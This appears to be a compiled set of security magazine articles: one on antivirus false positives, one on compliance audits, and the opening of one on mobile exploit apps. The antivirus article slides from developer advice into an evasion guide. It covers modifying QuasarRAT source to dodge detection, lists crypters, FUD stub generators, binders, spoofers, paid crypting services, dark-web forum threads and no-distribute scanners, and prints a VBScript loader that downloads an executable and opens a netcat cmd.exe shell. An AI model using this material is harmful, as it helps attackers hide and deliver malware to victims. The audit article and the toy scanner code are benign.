Bohdan Ethics

Ethical hacker with 12 years of experience. Worked at the CQR company in Ukraine. Geek, IT security addict. His nickname is VULNZ.

Many antivirus products are designed to function analogously to the human immune system. They operate by scanning the computer for signatures that correspond to known binary pathogens. The antivirus consults a dictionary of known viruses, and if any part of a file resembles a pattern in the dictionary, the antivirus neutralizes it.
Analogous to the immune system, the dictionary needs regular updates, like flu shots, to provide reasonable protection against emerging strains. An antivirus counteracts whatever it deems harmful. The problem is that new strains are created at a rate the antivirus developers may not be able to keep pace with.

Basic information

In this article we are going to talk about how antivirus protection is evaded, and how hard it can be for developers who create legitimate software to deal with antivirus detection. I strongly recommend that you use this information for white-hat purposes only; otherwise you can get into trouble. We will cover the things that help a developer avoid false positives when developing their software. Everybody who faces this problem should know the basics and the tools that help handle it.

False positive EXE.cuted: false positive problems on legitimate software

This research is intended for developers who face false positive results on their software.

Signature detection

Signature detection works as described in the introduction: the scanner compares the contents of files against a dictionary of patterns taken from known malware, and that dictionary has to be updated continuously as new strains appear.
Thus, the computer is vulnerable during the window between the first appearance of a virus and the release of the dictionary update by the antivirus vendor, which is the reason for keeping the antivirus updated as much as possible.

Scan engine methods

Most importantly, the antivirus's core function is its scan engine. The antivirus scans the data, and when a virus is detected it disinfects it. Below are the main basic scanning techniques.

Size (integrity checking): the antivirus can easily detect that a file has been changed or infected. It is common for viruses to append their malicious code at the end of a file. The antivirus records the file size (or a checksum) and later compares the stored value with the current one; if the file has grown although the user changed nothing, it suspects that something malicious has been running on the computer.

Pattern matching: each virus has a distinct signature. A signature is a distinctive byte sequence extracted from the malware, for example a few instructions of the routine it uses to infect files. The antivirus compares the scanned data with the signatures it knows, and a match is treated as a clear indication of infection.

Heuristics: a heuristic scan decides whether data is dangerous without knowing whether it contains a known virus. The technique analyzes what the code does and compares it against a list of hazardous actions. For instance, if the antivirus sees that a program attempts to open every EXE file and infect it by writing a copy of itself into it, it recognizes the program as dangerous and raises an alarm. The decision whether to remove the suspicious program is then left to the user.

Each of these methods has merits and drawbacks.
If the antivirus relies on the signature approach, the signatures must be updated regularly, at least daily, since new samples appear continuously (older literature quoted at least 15 new viruses a day; the real figure today is far higher). An antivirus that is left without updates for many days becomes a severe risk. Other things an antivirus does include monitoring incoming files and deleting any virus found in them, placing suspect files in quarantine, and updating its own software as the developers respond to emerging infections; the software can be configured to check for updates at regular intervals.

False positives

A false positive is a false identification of a computer virus: the antivirus classifies a good program as malicious. False positives are a weakness of any detection method. Small flaws in a detection method can cause false positives that are as harmful as false negatives. Ideally the false positive rate is zero or very close to it, and any rise in it is undesirable.

Note: This is a good example of what percentage of detections are false positives. The statistics are outdated, but the idea is clear. (figure)

Reasons for getting false positives

Some procedures scan very precisely by matching viruses against their exact signatures. The drawback of that approach is that it cannot detect new and unknown viruses. Generic methods, on the other hand, can identify all kinds of viruses without signatures, but at the cost of false positives. Heuristics, for instance, can detect new and unknown viruses but are prone to false positives, because a heuristic relies on probabilistic judgement and is never certain of an infection.
For example, if a heuristic engine observes a file open followed by file read and write operations, and also finds the string "Virus" inside the program, it may conclude that the file carries an unidentified virus. A clean program can satisfy all of these conditions as well; that is what produces false positives. As mentioned, generic methods are the most susceptible to them.

False positives ultimately come from the difficulty of telling good code from bad. A wrong decision produces either a false positive or a false negative. The antivirus only looks for signatures, not for the whole virus program, and it also uses wildcard signatures; the bytes a signature matches are not necessarily unique to virus code. Since conventional signatures are useless against polymorphic and metamorphic malware, modern antivirus products incorporate heuristic approaches to deal with such viruses, and those methods are the ones with high false positive rates.

Solutions

1. Every piece of software should carry the basic information expected of a binary file: description, version, product name, language, company name. Many false positives occur simply because the file has no version information, so it is flagged as suspicious or unwanted.

2. Check whether the file was flagged based on its MD5 hash; this is uncommon, but it can happen accidentally.

3. Packing the executable makes it harder to unpack. Using a custom packer is tempting, but it is better to use the standard UPX: a custom packer creates new problems because the antivirus cannot identify which packer was used.
Antivirus programs trust commonly used packers and dislike custom packers or packers marketed for antivirus evasion. Bear in mind that even a standard packer is not a free pass: the high entropy of a packed section is itself a signal for many engines, so pack only when there is a reason to.

4. Avoid hooks, and avoid writing to or reading from the registry unless it is needed. Registry access that looks suspicious and should be avoided: keys related to antivirus software, the firewall, remote administration, keyboard layout, file-extension associations, enabling or disabling updates, and reading or editing the event log.

5. Avoid using system programs and services related to remote administration or connections unless you are developing network software. Calling built-in software such as ftp, telnet, psexec, rdp and the like from inside your binary can cause a false positive, because a lot of malware uses, for example, the integrated FTP client to steal and transfer data over the internet. Prefer the operating system's APIs over spawning these tools.

6. It is a good idea to build an MSI package for installing and uninstalling the software. Antivirus programs were observed to trust MSI files more, because they are mostly used for legitimate purposes, and they pass behavioral analysis better.

(Figure: example of a terminal utility that packs an exe with UPX.)

7. Give the build the ability to check the compiled binary against the VirusTotal database right away and report advice.

8. If the developer wants to protect the code from reversing, anti-VirtualBox/sandbox and virtual-environment detection can be enabled. Note that sandbox evasion is itself a classic malware trait, so this can increase detections rather than reduce them.

9. Stop the community around your tool from using it to create malicious software. Talk to the community and check GitHub and other sites weekly to see whether someone has built malware with it; if that happens, antivirus companies look deeper at everything produced by the tool and may generate more false positives. This happened with the Develstudio project, a tool for creating GUI applications or binaries from PHP code.
According to the research, the project nearly shut down and lost a large number of followers because it was being used for creating malware rather than clean php2exe projects. The algorithm can be as simple as this: find all similar projects on GitHub, download them to the cloud and check all released binaries for viruses; to make it more thorough, compile them and check the result. This is not hard if the community is not big. Wrappers for common antivirus engines exist that make such checks easier than relying on VirusTotal alone.

10. Do not use the names of Windows core files or look-alikes of them: some antivirus products were found to react to names such as "svhost.exe" (a look-alike of svchost.exe), "system32.exe", etc.

11. Do not use the names of commonly used software such as "firefox.exe", "chrome.exe", etc. It was shown that 3 to 5% of antivirus products react to such names by comparing the MD5 of the real product's versions with the binary.

12. One of the most important steps in software development is approval: any binary that is not signed, or not known to the vendor's reputation service as commonly used, will be blocked by the browser or by Windows SmartScreen. The author provides a batch file that automates signing, and points to a commercial vendor from which a certificate and signing software can be bought.

13. Do not put multiple exe files inside one. This behaviour is typical of a Trojan horse, so be aware that archiving one binary inside another, for whatever reason, can cause problems.

Note: an example of an exe joiner that was marked as malicious without actually being so, simply because it is commonly used to glue malicious software together, so its algorithm is marked as malicious too. (figure)

14. It was found that some binaries contain very long runs of consecutive zero bytes.
Antivirus products may treat this as problematic, because malware creates deliberately unused regions in memory or on disk to change its MD5 hash, to bypass some behavioral analysis, or to bypass signature-based analysis. Avoid large, unexplained zero-filled regions in the binary; normal section padding is unavoidable and is not what triggers this, oversized reserved buffers and padding added to alter the hash are.

15. It is a good idea to let users read the terms and conditions before they install or run the software. There is no confirmed information that antivirus products check for the presence of terms and conditions.

16. A custom icon for the binary is one reason it may not be detected as malicious. As explained earlier, machine-learning techniques build a picture of what malware should look like, and most malware either has no icon at all (the standard one) or uses an icon its author stole, which is detected as well.

17. Do not use special characters, large amounts of whitespace or many dots in the file name. It was checked many times with different antivirus products that, as a defence against extension spoofing, names that violate certain rules are blocked and marked as malicious. This is easy to verify by giving a clean exe a spoofed name.

18. Files that download other files or source code from the internet and run them look like a problem to some antivirus products, since they cannot control all the resulting processes, so the action is marked as suspicious.

19. Files that download and load libraries can be flagged as dangerous, because machine-learning models have seen certain DLLs used in the mass production of malware, and you may accidentally be using one of them. It is always better to use software integrated into the OS.

20. Try not to inject into a running process, because, as mentioned before, many antivirus solutions watch for hooks and injectors and mark them suspicious even if they do no harm.
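As an added illustration of the scanning techniques described earlier (pattern matching with wildcard signatures, and the long-zero-run heuristic from item 14), here is a toy scan engine in Python. It is example code written for this article's topic, not the code of any antivirus product and not ClamAV's engine, although the signature syntax (hex bytes with ?? as a one-byte wildcard) follows the ClamAV convention. The sample buffers are constructed: the "signature" is the call/pop get-PC idiom common in position-independent shellcode, and a benign buffer that happens to contain the same idiom shows how a signature match can be a false positive.

```python
"""Toy scan engine: wildcard hex signatures plus a zero-run heuristic (example code)."""
import re

# Signature syntax follows the ClamAV convention for hex signatures: pairs of hex
# digits are literal bytes, "??" matches any single byte.
SIGNATURES = {
    # constructed example: call +0 / pop ebx / add ebx, imm32 (get-PC idiom)
    "getpc.callpop": "e8000000005b81c3????????",
}


def compile_signature(hexsig):
    """Turn a hex signature with ?? wildcards into a compiled bytes regex."""
    hexsig = hexsig.replace(" ", "").lower()
    if len(hexsig) % 2:
        raise ValueError("hex signature must have an even number of digits")
    parts = []
    for i in range(0, len(hexsig), 2):
        pair = hexsig[i:i + 2]
        parts.append(b"." if pair == "??" else b"\\x%02x" % int(pair, 16))
    return re.compile(b"".join(parts), re.DOTALL)  # DOTALL so "." also matches 0x0a


def longest_zero_run(data):
    """Length of the longest run of consecutive 0x00 bytes in data."""
    return max((len(m.group()) for m in re.finditer(rb"\x00+", data)), default=0)


def scan(data, signatures=SIGNATURES, zero_run_threshold=4096):
    """Return signature hits, the zero-run measurement and a verdict.
    A signature hit is treated as 'malicious'; a long zero run alone is only 'suspicious'."""
    hits = [name for name, sig in signatures.items() if compile_signature(sig).search(data)]
    zeros = longest_zero_run(data)
    if hits:
        verdict = "malicious"
    elif zeros >= zero_run_threshold:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"signature_hits": hits, "longest_zero_run": zeros, "verdict": verdict}


# Constructed sample buffers (not real files, just byte strings with a fake MZ prefix).
GETPC = b"\xe8\x00\x00\x00\x00\x5b\x81\xc3\x10\x20\x30\x40"
MALWARE_SAMPLE = b"MZ" + b"\x90" * 8 + GETPC + b"\xff\xe3"           # idiom followed by jmp ebx
BENIGN_FALSE_POSITIVE = b"MZ" + b"hello world" + GETPC + b"\xc3"      # same idiom in a clean stub
BENIGN_CLEAN = b"MZ" + b"This program cannot be run in DOS mode." + b"\x00" * 16
ZERO_PADDED = b"MZ" + b"\x00" * 5000 + b"\xc3"                         # oversized zero region

if __name__ == "__main__":
    for label, blob in [("malware", MALWARE_SAMPLE),
                        ("benign (false positive)", BENIGN_FALSE_POSITIVE),
                        ("benign (clean)", BENIGN_CLEAN),
                        ("zero padded", ZERO_PADDED)]:
        print(f"{label:24s} {scan(blob)}")
```

The benign stub is flagged exactly like the malware sample because the signature describes an idiom, not the malware, which is the point made above about signatures matching bytes that are not unique to virus code. The zero-run heuristic fires on the padded buffer without any signature hit, which is why item 14 matters for developers shipping clean binaries.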
Signature creation process: a good article exists that explains how signatures for ClamAV are created; it was read, and some of the additional information above is based on it.

Solving the problem: software could be developed that detects how a binary was compiled and walks the developer through the steps above to avoid these problems, or this could be integrated into the compiler (not necessarily a good idea, given the size it would add). All the steps are listed above. The idea is to make life easier for developers who want to distribute their software but constantly face false positives. This could be a separate product, or shipped as a set of "tools" that help developers with the issue.

Note: Example of what an exe maker/wrapper that helps bypass false positives could look like. (figure)

To summarize the information above, here is what antivirus engineers answer when asked why false positives occur on their products:

Ryan Permeh, Cylance: "The Cylance engine is not an antivirus engine. Unlike AV, it doesn’t have a bias toward letting everything run. The technology doesn't assume a file is good until it’s evaluated. Our approach is to measure and decide on each and every file individually, and if it doesn't fit into our model of good, it leans towards bad. Without a bunch of data to base a decision on, and without any real patterns of goodness to identify it as such, the engine leaned heavily on the structural bits that are odd and drew a line towards bad in this case. When we train models, we train on hundreds of millions of good and hundreds of millions of bad files (samples). We look at several million potential data points (features) in each file. In general, a piece of code can become "bad" by doing things that lean towards bad. But it can also lean towards bad by not doing things that lean towards good.
So in the most basic example provided (hello world in debug build): the sample was small. It didn't show any bad, but it didn't show any good either; one-function programs are almost always malware; debug builds are statistically weird; using mingw rather than Visual Studio is statistically weird. The output binary is 'odd.'"

Hyrum Anderson, Endgame: "Before Twitter caught ablaze with these “hello world” samples, our own internal research indicated that our and other models were susceptible to these toy samples. Let’s explain why. Endgame’s machine learning malware detection uses static features to determine before a customer executes a file whether it is likely malicious or benign. The machine learning model is an imperfect summarization of tens of millions of malicious and benign software on which the model was trained. As an imperfect model, it can obviously be wrong, but still extremely useful in detecting never before seen malware, far more useful than approaches which rely on signatures for already known malware families. For the case of our model and other machine learning models based on static features, the model can be wrong in this case because, in the training dataset, the model has seen: lots of real malware samples that are small unsigned binaries; lots of real malware samples where the entry point (.text) section is small, like droppers' unpacking stubs; lots of real malware samples that attempt to hide their imports from static analysis by some method, so that their import table looks very small. On the contrary, there are very few “useful” benign files that are small, certainly too few to contradict the above experience. It’s important to note that machine learning is actually quite good for prevention and detection of malware, both novel samples and the more well known. Endgame was one of the only few to get NotPetya in VirusTotal, for example.
That said, all machine learning models have blind spots (false negatives) and they can mistakenly call things bad (false positives). In fact, we’ve shown in our published research that for some machine learning models, these vulnerabilities can be quite convenient to exploit... At Endgame, we employ a strategy of layered protections that align with a large number of commonly seen attacker actions. Our MalwareScore engine (released standalone in VirusTotal) represents only a single slice of that layered protection paradigm. The layers work in concert to alert our customers of potential threats (reducing FNs), and working together to build a complete story of a potential threat (reducing FPs). Fortunately, the samples highlighted on Twitter are interesting corner cases, but are extremely esoteric for our customer base. Nevertheless, we continually are doing more research to improve our detection ratio and reduce our false positive rate. This involves data gathering to increase our model’s understanding of the universe of benign and malicious software as well as a huge amount of experimentation effort to maximize our model’s performance. We put a great amount of attention on addressing known false positives seen by our customers. As a result of these efforts, we regularly release models to our customers and to VirusTotal. And, we continue to work with 3rd parties to validate our model’s performance on real files.” Dr. Sven Krasser, CrowdStrike: "There are two important aspects to understand. First, the machine learning models for static file analysis we use at CrowdStrike are optimized to detect malware, especially novel families that bypass signature-based approaches, while avoiding interference with legitimate business applications. However, unusual and artificially constructed files fitting into neither of these two categories are occasionally detected as well. For this reason, we expose confidence values and allow customers to set their own thresholds. 
While in this instance our file analysis engine was arguably too aggressive, generally this behavior is by design: if a file does not look like a legitimately useful application while also exposing unusual traits, then the sound call is to prevent it from executing. Avoiding odd looking yet potentially benign objects should be a familiar concept should you have ever opened an office fridge before. Second, static file analysis alone (i.e. what most vendors provide on VirusTotal) is simply not a sufficient security tool on its own. It is easy to create files that behave benignly yet are detected by both signature and ML-based engines. It is, however, also possible to create malware files that bypass detection. That is trivially possible for signature-based engines, but one can also bypass ML-based static file analysis with some effort. Therefore, CrowdStrike Falcon uses static file analysis as only one of many techniques to detect threats while combining it with several other layers of defense, such as advanced Indicators of Attack."

Compilation from source

Taking Quasar as the example (https://github.com/quasar/QuasarRAT), you can build it from source with Visual Studio 2017. Before building, you can modify the code itself:
1) add commands or variables that do not affect the program flow;
2) add extra functions that do something;
3) delay the execution of some operations;
4) rename variables throughout the project;
5) obfuscate the code;
6) remove fingerprints (project and author names and similar).

To find which part of the code the antivirus objects to, truncate the binary to successively longer lengths (for example with head -c) and scan each truncated copy; the length at which the detection first appears tells you where the flagged bytes are.
Hex editors
https://mh-nexus.de/en/hxd/
https://www.x-ways.net/winhex/
https://www.wxhexeditor.org/

Debuggers
https://www.immunityinc.com/products/canvas/debugger
https://samsclass.info/127/proj/p8aim.htm (article)
https://exelab.ru/download.php?action=list&n=MTA=

Signature certificate
http://qaru.site/questions/54786/signing-a-windows-exe-file (guide: signing a Windows executable the standard way)
https://www.connect-trojan.net/2016/06/aegis-crypter-8.5.html (Aegis crypter has this function)

Installers and SFX
https://www.advancedinstaller.com/
https://www.actualinstaller.com/
http://www.cyberforum.ru/cmd-bat/thread2022256.html (SFX archive)

Packers
UPX, ASPack, FSG, PeShield, VMProtect
https://github.com/EgeBalci/Amber
https://github.com/Eronana/packer
http://www.webtoolmaster.com/packer.htm
https://www.boxedapp.com/
https://github.com/SerGreen/Appacker (a very interesting packer; it can pack an entire folder)

Protectors and anti-debugging
https://github.com/bekdepo/cryptor (needs to be compiled)
https://github.com/Paskowsky/DreamProtectorFree (GUI)
https://exelab.ru/download.php?action=list&n=NDA= (a collection of protectors that is still relevant)

Crypters
https://github.com/Ch0pin/AVIator/tree/master/Compiled%20Binaries
https://github.com/Ch0pin/AVIator
https://github.com/NYAN-x-CAT/Lime-Crypter
https://github.com/extremecoders-re/xor-files (XOR)
https://github.com/malwares/Crypter (a huge list; needs compiling)
https://github.com/guilhermej/scantime_py_crypter (easy to understand; the key can be changed)

Stub generators
https://www.youtube.com/watch?v=_Qx3UZAuo8o
https://www.mediafire.com/file/pazaz4pzwk27eow/%5BVIP%5DCrypter+v2f%2BUnique+Stub+Generator+0.5.1+%5BFUD%5D%5BApril+2014%5D.rar

Loader / Dropper
A loader is a downloader that by itself does not affect the system in any way; it stays on the system for the specified time and, after it has completed
downloading the payload, it is usually no longer used. Example loaders are .vbs, .js, .hta, .bat, .ps1 and similar files. Windows also ships with built-in tools such as ftp, start (from batch files), PowerShell scripts and certutil that can download malware.

• Article on this subject: https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/

• Example of a loader in VBScript (downloads an executable over HTTP, saves it to disk and runs it; here the payload is netcat listening on port 4444 with a command shell attached):

    ' Download a file over HTTP, save it locally and execute it
    Dim http_obj, stream_obj, shell_obj
    Set http_obj = CreateObject("Microsoft.XMLHTTP")
    Set stream_obj = CreateObject("ADODB.Stream")
    Set shell_obj = CreateObject("WScript.Shell")

    URL = "http://www.mikemurr.com/example.exe"    ' Where to download the file from
    FILENAME = "nc.exe"                             ' Name to save the file as (on the local system)
    RUNCMD = "nc.exe -L -p 4444 -e cmd.exe"         ' Command to run after downloading

    http_obj.open "GET", URL, False
    http_obj.send
    stream_obj.type = 1                             ' adTypeBinary
    stream_obj.open
    stream_obj.write http_obj.responseBody
    stream_obj.savetofile FILENAME, 2               ' adSaveCreateOverWrite
    shell_obj.run RUNCMD

https://github.com/d4rkcat/cryptbinder
https://github.com/93aef0ce4dd141ece6f5/File-Binder (simple; generates a stub)
https://github.com/NAWAK01/WinRAT (classic command-line dropper)

Spoofers and maskers
https://github.com/henriksb/ExtensionSpoofer
https://github.com/AHXR/maskedkitty
https://mega.nz/#!NxZACbJA!me-l4SBMoMkAGqbg1rwIVBLINeNvudC21NEBuskrsxU
https//www.forw.forw.forw.for showthread.php? t = 996627

Glue / Joiner
Joiner by Blade, SuperGlue, MicroJoiner, Juntador
https://github.com/danielhnmoreno/pyJoiner
https://www.exejoiner.com/

Delivery
Online formats: Doc, Docx, RTF. Options: social engineering, exploits for specific versions of the viewer application. Obfuscation is often used when delivering documents.
Offline options: social engineering, capturing equipment, physical access.
Rubber Ducky
https://github.com/SkiddieTech/UAC-DE-Rubber-Ducky
https://github.com/hak5darren/USB-Rubber-Ducky
Digispark
https://github.com/CedArctic/DigiSpark-Scripts
Ninja cable
https://usbninja.com/
In offline delivery, spoofers can and should be used.

What a cryptor should contain to be secure: anti ring-3 hooks, anti-emulator, anti-debugger, anti-dumper, anti-VM/sandbox. Be aware that these can themselves trigger antivirus false positives.

• Paid services
https://theoldphantom.net/
https://spartanproducts.net/
http://staticsoftwares.pro/
• People
https://bhf.io/threads/534014/
https://lolzteam.org/threads/964713/
https://darkwebs.cc/threads/95571/
https://darkwebs.cc/threads/74946/
https://lolzteam.org/threads/314158/
• Free services
http://virtualcrypt.xyz/
https://www.crypter.com/download.html
• Crypter forums
http://shanghaiblackgoons.com/crypters/
http://www.blackhatrussia.com/crypters/
https://zhacker.net/crypter/
https://ifud.ws/forums/kriptory-jojnery.2/
• Where to check for FUD (no-distribute scanners that do not share samples with vendors)
https://nodistribute.com
https://antiscan.me/
https://run4me.net/

Additionally
Information on what affects detections, from MD5 to behavior and icons: https://github.com/vulnz/false-positive-executed
https://ifud.ws/threads/exel-b-kurs-videourokov-krehkerstvo-programmirovanie-2017-pcrec.13022/ (Exelab courses and software)

Compliance Audit for Critical Infrastructure

Dinesh Sharma

I always try to find bypasses, even in everyday things and systems, and that takes me deep into the security domain. I am still a student and always will be. I spent many sleepless nights to achieve the goal of my interest. I like Python because it is very easy to write and very powerful as well. Last year I passed the CEH v9 exam.
I have certifications in Network Security, Web Security, Android apk security, Linux server hardening, Anonymous browsing and End-point protection. I am a hacker as well as a developer. I like to break things in order to secure them; I love Python programming, developing websites and developing Android apps. I am always open for exciting opportunities in the security domain. Currently, I am working as a Security Consultant at Security Brigade InfoSec Private Limited. I am a fun loving person. You can connect with me on LinkedIn or GitHub: https://www.linkedin.com/in/dinesh2 https://github.com/Dineshboss

Introduction

Compliance audit is a special kind of audit done to ensure that the standard policy defined by some world-recognized institute is being followed by the enterprise network. Customers also prefer to work with a company that takes its security as a major concern.

Fig 1.1 Steps to achieve information security standard

In an organization, they have their own GRC team, which stands for Grievance, Risk and Advisory. This team has some auditors who perform the compliance audit for the enterprise network in order to ensure that the standard policy or SCD is being followed.

Types of Compliance Audit

Now let's try to understand the types of compliance audit. These are given below:

• SOC 2: SOC 2 is a compliance audit defined by the AICPA (The American Institute of Certified Public Accountants). Companies that provide cloud solutions or process customer data in the cloud have to undergo the thorough SOC 2 compliance audit.
There are many companies that provide SaaS (software as a service) and have many security bugs. A SOC 2 audit done by a certified auditor detects these bugs in their SaaS and defines a time period to complete the fixing of the bugs.

Fig 2.1 Security controls in SOC 2 compliance audit

SOC 2 can be divided into two parts. These are given below:

• SOC 2 type 1: It is done at a point in time. Questions are created and closed at that time only, in order to check whether the proper controls are implemented or not.
• SOC 2 type 2: It covers a period of time. It is basically defined as six months the first time and one year thereafter.

ISO 27001

It is a compliance audit which, unlike SOC 2 (which is specially defined for SaaS companies), is adopted by all kinds of enterprises in order to check the information security process for their assets, like employees, third parties, company data, information security systems, etc. When a company fulfills all the requirements of ISO compliance, an ISO 27001 certificate is issued to that company by the ISO certified auditors.

Fig 2.2 ISO 27001 checklist

General Data Protection Regulation (GDPR)

Any company that deals with EU citizens' data has to go through this compliance audit. It was previously defined for EU companies only, but nowadays any company that processes EU citizens' data has to follow this GDPR audit.

Fig 2.3 GDPR controls

Sarbanes-Oxley (SOX)

This standard was defined by the US government in order to protect shareholders from inaccurate financial reporting by companies. Any organization that works in the financial industry has to comply with this SOX audit.
Fig 2.4 SOX audit

Industry-Specific Compliance Audits

These are some of the compliance audits defined for a specific industry:

• PCI-DSS (credit card and payments industry): It is designed for the financial, merchant and payment solution provider companies. They are a major target of hackers, who generally try to compromise these industries in order to steal the customers' money.

Fig 2.5 PCI DSS Requirements

• HIPAA (health care industry): It is defined to protect patient data in the health care industry.

Fig 2.6 HIPAA Requirements

Some basic controls in all the compliance audits

Controls are the modules that define a particular way to achieve an information-secure environment. Some of the common controls are given below:

• Access control

When we talk about accessing any enterprise assets, the access control rules should be defined prior to this. Access control means how many resources are available to a particular user. Access control can be of two types:

• Logical access control

It basically defines the access level of a user in an application. Take an application in an enterprise network. There are many users in that application: some of them are admins, some of them are basic users. Admins are from different departments, so different access is provided to them. Let's take an example of two admins. One admin is from the SOC department and the other one is from the developer department. The access given below is provided to the SOC admin:

Access log view
Manage profile
Add another admin
Delete existing admin

Now the developer admin has the rights mentioned below:

Manage profile
Add another admin
Delete existing admin
Modify the existing admin

Based on the above situation, we have to make some questions and try to get POCs or mail confirmation for the same.
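The rights comparison just described can be made repeatable. The following is an added example in Python, not code from the article: it compares the rights each admin actually holds with the rights the SOP allows for that admin's role, and emits the audit question and the evidence to request for every excess right. The SOP matrix, the user names and the "Contractor admin" role are constructed sample data and assumptions, not taken from any real application.

```python
"""Logical access control review (added example; not the article's code).

Compares the rights each admin actually holds with the rights the
organization's SOP allows for that admin's role, and turns every excess
right into an audit question that the application owner must answer with
a business justification.  All data below is constructed: the SOP matrix,
user names and role names are assumptions, not taken from a real system.
"""

# Rights the (hypothetical) SOP allows per role.  A SOC admin needs to
# view logs and manage their own profile; admin lifecycle belongs to the
# developer admin.
SOP_ALLOWED_RIGHTS = {
    "SOC admin": {"Access log view", "Manage profile"},
    "Developer admin": {
        "Manage profile",
        "Add another admin",
        "Delete existing admin",
        "Modify the existing admin",
    },
}

# Rights observed in the application (constructed sample export).
OBSERVED_ADMINS = [
    {"user": "soc.admin1", "role": "SOC admin",
     "rights": {"Access log view", "Manage profile",
                "Add another admin", "Delete existing admin"}},
    {"user": "dev.admin1", "role": "Developer admin",
     "rights": {"Manage profile", "Add another admin",
                "Delete existing admin", "Modify the existing admin"}},
    {"user": "tmp.admin", "role": "Contractor admin",
     "rights": {"Manage profile"}},
]

REQUIRED_DOCUMENT = ("SOP for rights allocation to admins, "
                     "from the application owner")


def excess_rights(admin, sop=SOP_ALLOWED_RIGHTS):
    """Rights the admin holds beyond the SOP allowance for their role.

    A role missing from the SOP has no allowance at all, so every right
    it holds is excess and must be justified."""
    allowed = sop.get(admin["role"], set())
    return sorted(admin["rights"] - allowed)


def audit_findings(admins=OBSERVED_ADMINS, sop=SOP_ALLOWED_RIGHTS):
    """One finding per admin with excess rights, phrased as the audit
    question the article asks, plus the evidence to request."""
    findings = []
    for admin in admins:
        extra = excess_rights(admin, sop)
        if not extra:
            continue
        reason = ("role not defined in SOP" if admin["role"] not in sop
                  else "rights beyond SOP allowance")
        findings.append({
            "user": admin["user"],
            "role": admin["role"],
            "excess_rights": extra,
            "reason": reason,
            "question": (
                f"Why are {' and '.join(extra)} rights provided to the "
                f"{admin['role']} ({admin['user']})? Kindly provide the "
                "business justification for the same."
            ),
            "required_document": REQUIRED_DOCUMENT,
        })
    return findings


if __name__ == "__main__":
    for f in audit_findings():
        print(f"[{f['reason']}] {f['question']}")
        print(f"  Evidence to request: {f['required_document']}")
```

Run against a real rights export, the SOP matrix is the document the application owner has to provide; an admin whose role is not in the SOP at all is reported as a separate finding, since no justification can exist for rights that no role definition covers.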
As we can see, the SOC admin has the right to add admins, but there is no need to provide him the right to add or delete admins. So our question will be: "Why are add and delete admin rights provided to the SOC admin? Kindly provide the business justification for the same."

Note: Required document: SOP for rights allocation to admins, from the application owner. This situation is considered under logical access control.

• Physical access controls

In these controls we discuss physical access to the secure environment. Let's take an example. There is a server room and servers are placed in racks. So we asked for a list of all the individuals who entered the server room and we found that an electrician entered the server room. So, our questions will be:

• Who gave permission to that electrician?
• Was the infra admin aware that an electrician entered the server room?
• On what basis was this entry provided?
• Was a higher authority there with him when he was inside the server room?
• CCTV footage for the same?

Encryption

This is very important when we talk about privacy as data flows from the external IT infra to the secure server environment or from the secure environment to the external IT infrastructure. So, our questions will be:

• Is 2-way TLS implemented on the data leaving the secure zone?
• Is 2-way TLS implemented among the servers in the secure environment?
• Is the internet accessible from the secure zone (server environment)?

Logging and Monitoring:

In this module, we basically talk about the logs generated at different systems. Let's take an example. There is a server and it is accessible through PIM (Privileged Identity Management). So, one who has valid credentials first has to log in to the PIM. Then from the PIM, he will log in to the server using PuTTY. So, our questions will be:

• Are PIM access logs maintained?
• How long are PIM access logs maintained?
• Are server access logs maintained through PIM?
• How long are they maintained?
• Is there any situation in which direct access to the server is provided?
• Is monitoring done periodically?

Conclusion

Compliance audit has its own importance. In order to ensure defense-in-depth security for an organization, it is important to perform penetration tests as well as compliance audits periodically, and the fixes must be implemented as soon as possible.

The Significance of Mobile Exploit Applications
Ankit Giri

Speaker, presenter, and blogger, Ankit has a diverse background in writing informational blogs. A penetration tester by profession with 4+ years of experience. Part-time bug bounty hunter. Featured in the Hall of Fame of EFF, GM, SONY, HTC, Pagerduty, HTC, AT&T, Mobikwik and with multiple other Halls of Fame. He loves speaking at conferences, has been a feature at RSA APAC 2018, BSides Delhi 2017, CSA, Dehradun, Cyber Square Summit, OWASP Jaipur and has been a regular feature at Infosec meetups like Null and OWASP Delhi Chapter, Test Tribe and Peerlyst meetups. Ankit has also taken a hands-on session on Securing AWS environments at null Bachaav. He has presented and demonstrated getting started with AWS at Fore School of Management. He also leads the show for the Peerlyst DelhiNCR chapter. He has an upcoming talk at RSA US 2019 on Mastering AWS pentesting and methodology.
He has published an article in PenTest Magazine on IoT security. He has been a featured profile at Peerlyst.

With the ever-changing scenario of mobile OSs, the limitations on rooting and jailbreaking will lead to mobile exploit applications becoming more significant. While these apps sit on an end user's device they help steal data (say, by reading application logs), make the vulnerable app unusable (logical DoS), bypass authentication and gain access (invoking an exported activity) and at times farm clicks (tapjacking). Mobile exploit application development will be the next big thing, and there are people taking up such things already.

What is an exploit application?

These are mobile applications developed to exploit (or make use of) an existing vulnerability in one of the applications installed on your phone. For example, if you have an application with logs set to world-readable, this exploit application will fetch the logs, look for sensitive information in them and send it to a server for the next step of action. This is the probable method of stealing PII and user-sensitive information like credentials, API keys and credit card details.

Is the OS itself vulnerable?

The mobile OS ecosystem is predominantly filled by the following two OSs: Android and iOS. We will be looking at the architecture, the default security mechanisms implemented, and safeguarding techniques. This is not a comparison between the two operating systems; we will go through both OSs one by one.

Android Architecture

Source: https://androidclarified.com/android-architecture/

UID Separation

The major sandboxing in Android is done using UID separation, and it prevents anything other than the app itself, certain components of the OS, or the "root" user from accessing its data. In the image below, it can be seen that a UID is assigned to each of the different apps or "packages" on the device.
These userId values are the same as the ones we will see when we view the permissions on the app's files.

It can also be seen that on the left of the UID/GID is a column that shows the file or directory's permissions. The first character identifies the file type (- for regular files, d for directories).

iOS Architecture

Source: https://www.cse.wustl.edu/~jain/cse571-14/ftp/ios_security/index.html

The changing scenario of jailbreaking and rooting

Jailbreaking

There is a general belief that iOS is a secure OS, with hardware-based encryption in place, and the claims do sound true. At the same time, jailbreaking iOS devices has become more difficult with every release. The newer devices coming with iOS 12 have been difficult to jailbreak; Apple has been upping the ante against jailbreakers. The firm has started releasing patches for security vulnerabilities at shorter time frames. This has led to the fixing of vulnerabilities used by jailbreaks, but it also changes the security posture of the OS, which eventually makes jailbreaking difficult. Apple also stops signing the older iOS versions that can be jailbroken. iOS 12 has introduced CoreTrust, which checks that all signatures come from Apple, thus stopping fake signing. It also has vm_map_exec_lockdown, which locks down the executable segment, preventing remapping. Read more about these changes in Apple's changelog.

To Root or Not to Root

